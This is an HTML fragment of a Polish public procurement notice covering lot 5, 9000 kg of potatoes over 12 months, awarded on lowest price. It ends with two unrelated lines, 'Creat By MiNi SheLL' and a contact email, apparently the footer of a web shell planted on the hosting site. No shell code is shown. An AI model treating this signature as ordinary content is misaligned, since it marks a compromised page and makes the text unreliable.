<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.      Ziemniaki	kg	9000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.31.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com